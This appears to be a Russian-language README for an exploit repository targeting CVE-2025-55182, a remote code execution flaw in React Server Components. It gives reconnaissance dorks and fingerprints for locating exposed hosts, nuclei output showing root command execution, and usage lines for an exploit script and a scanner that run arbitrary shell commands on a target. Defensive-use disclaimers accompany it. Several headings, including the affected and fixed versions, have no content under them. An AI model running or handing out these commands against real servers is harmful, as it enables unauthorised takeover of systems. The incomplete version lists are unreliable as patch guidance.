
Критическая уязвимость удаленного выполнения кода (RCE), затрагивающая реализацию серверных компонентов React (RSC) в нескольких пакетах, включая.
CVE-2025-55182 — это критическая уязвимость удаленного выполнения кода (RCE), затрагивающая реализацию React Server Components (RSC) в нескольких пакетах, включая:
Уязвимость существует из-за небезопасной десериализации полезных нагрузок, отправляемых через внутренний протокол Flight, используемый RSC. Когда определенные недоверенные входные данные поступают через React Server Components по HTTP-запросам, может быть запущено выполнение кода на стороне сервера.
Затронутые версии:
Исправленные версии:
React Server Components принимают клиентские запросы, которые анализируются и десериализуются на бэкенде. Уязвимость возникает из-за недостаточного контроля над десериализацией входящих данных, что позволяет специально сформированным полезным нагрузкам интерпретироваться как исполняемые серверные компоненты.
Когда это происходит, на сервере может быть выполнено произвольное JavaScript, что может привести к полной компрометации сервера в зависимости от среды хостинга и привилегий.
Если уязвимость будет использована, злоумышленник может:
Оценка CVSS: 10.0 – КРИТИЧЕСКИЙ
Проверить, использует ли приложение React Server Components и используются ли затронутые версии.
curl -I https://target.com/?__rsc=1
Эти ключевые слова помогают определить, ссылается ли публично доступный репозиторий или веб-приложение на компоненты RSC.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
Предназначено только для внутреннего аудита вашего собственного домена.
Проверка использования открытых фреймворков, а не эксплуатации уязвимости.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
Для автоматизации защитного сканирования клонируйте шаблонную логику обнаружения для оценки собственной инфраструктуры:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)Полнофункциональный скрипт эксплойта RCE, который выполняет произвольные команды и извлекает вывод.
Использование:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Сканирование с командой по умолчанию (id)
./scanner.sh -d example.com
# Выполнение произвольной команды
./scanner.sh -d example.com -c "whoami"
# С полным URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain — целевой домен/URL (обязательно)-c, --command — команда для выполнения (по умолчанию: id)# Проверить уязвимость цели
./scanner.sh -d vulnerable-app.com
# Получить информацию о системе
./scanner.sh -d vulnerable-app.com -c "uname -a"
# Вывести список файлов
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Шаблоны в репозитории предназначены для:
ВАЖНО: Эти шаблоны должны выполняться только на системах, которые вам принадлежат или на которые у вас есть разрешение на оценку.
Шаблоны Nuclei, включенные в этот репозиторий, предназначены исключительно для:
Пожалуйста, убедитесь, что:
Обновитесь до одной из исправленных версий:
Исследователь безопасности • Тренер по кибербезопасности • Хантер за багами
Девиз: Полная безопасность с нулевым доверием 🚀
CVE-2025-55182 в настоящее время является одной из самых критических угроз для инфраструктур на основе React. Из-за тривиального вектора эксплуатации и неаутентифицированной поверхности атаки настоятельно рекомендуется немедленное исправление. Любая организация, использующая затронутые версии RSC, должна рассматривать это как аварийный приоритет.
Этот репозиторий и документация предназначены для защитных исследований и проверки безопасности активов, которыми вы владеете. Любое неправильное использование может быть незаконным. Вы несете ответственность за соблюдение законов и политики организации.
Сделано с ❤️ от Cyber Leelawat
Полная безопасность с нулевым доверием 🎯🔐